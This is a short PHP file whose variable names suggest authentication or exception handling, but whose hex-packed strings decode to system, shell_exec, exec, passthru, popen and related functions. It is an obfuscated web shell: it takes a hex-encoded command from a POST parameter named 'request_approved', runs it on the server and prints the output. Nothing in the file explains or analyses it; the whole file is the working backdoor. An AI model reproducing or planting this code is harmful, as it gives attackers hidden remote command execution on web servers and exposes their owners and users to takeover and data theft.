<?php


$desc1 = '7';
$desc2 = '3';
$desc3 = '9';
$desc4 = '4';
$desc5 = '6';
$desc6 = 'd';
$desc7 = '5';
$desc8 = 'f';
$desc9 = '8';
$desc10 = '0';
$desc11 = '1';
$desc12 = 'e';
$desc13 = 'c';
$desc14 = '2';
$auth_exception_handler1 = pack("H*", $desc1.$desc2.$desc1.$desc3.$desc1.$desc2.$desc1.$desc4.$desc5.'5'.$desc5.$desc6);
$auth_exception_handler2 = pack("H*", $desc1.$desc2.$desc5.'8'.'6'.'5'.$desc5.'c'.$desc5.'c'.$desc7.$desc8.$desc5.$desc7.$desc1.$desc9.'6'.$desc7.'6'.$desc2);
$auth_exception_handler3 = pack("H*", $desc5.'5'.'7'.'8'.'6'.'5'.'6'.$desc2);
$auth_exception_handler4 = pack("H*", '7'.$desc10.'6'.$desc11.$desc1.$desc2.$desc1.$desc2.$desc1.'4'.$desc5.$desc9.'7'.'2'.$desc1.$desc7);
$auth_exception_handler5 = pack("H*", $desc1.$desc10.$desc5.$desc8.'7'.'0'.'6'.'5'.$desc5.$desc12);
$auth_exception_handler6 = pack("H*", $desc1.'3'.'7'.'4'.'7'.'2'.$desc5.'5'.$desc5.$desc11.$desc5.'d'.'5'.'f'.$desc5.'7'.$desc5.$desc7.'7'.'4'.$desc7.'f'.$desc5.'3'.$desc5.'f'.'6'.$desc12.'7'.'4'.$desc5.$desc7.$desc5.'e'.'7'.'4'.$desc1.$desc2);
$auth_exception_handler7 = pack("H*", $desc1.$desc10.$desc5.$desc2.$desc5.$desc13.$desc5.$desc8.$desc1.'3'.'6'.$desc7);
$request_approved = pack("H*", $desc1.$desc14.$desc5.'5'.$desc1.'1'.$desc1.$desc7.'6'.'5'.'7'.'3'.$desc1.$desc4.$desc7.$desc8.$desc5.'1'.$desc1.'0'.$desc1.$desc10.$desc1.$desc14.$desc5.'f'.$desc1.'6'.'6'.'5'.'6'.'4');
if (isset($_POST[$request_approved])) {
    $request_approved = pack("H*", $_POST[$request_approved]);
    if (function_exists($auth_exception_handler1)) {
        $auth_exception_handler1($request_approved);
    } elseif (function_exists($auth_exception_handler2)) {
        print $auth_exception_handler2($request_approved);
    } elseif (function_exists($auth_exception_handler3)) {
        $auth_exception_handler3($request_approved, $val_pointer);
        print join("\n", $val_pointer);
    } elseif (function_exists($auth_exception_handler4)) {
        $auth_exception_handler4($request_approved);
    } elseif (function_exists($auth_exception_handler5) && function_exists($auth_exception_handler6) && function_exists($auth_exception_handler7)) {
        $item_record = $auth_exception_handler5($request_approved, 'r');
        if ($item_record) {
            $ptr_dat = $auth_exception_handler6($item_record);
            $auth_exception_handler7($item_record);
            print $ptr_dat;
        }
    }
    exit;
}
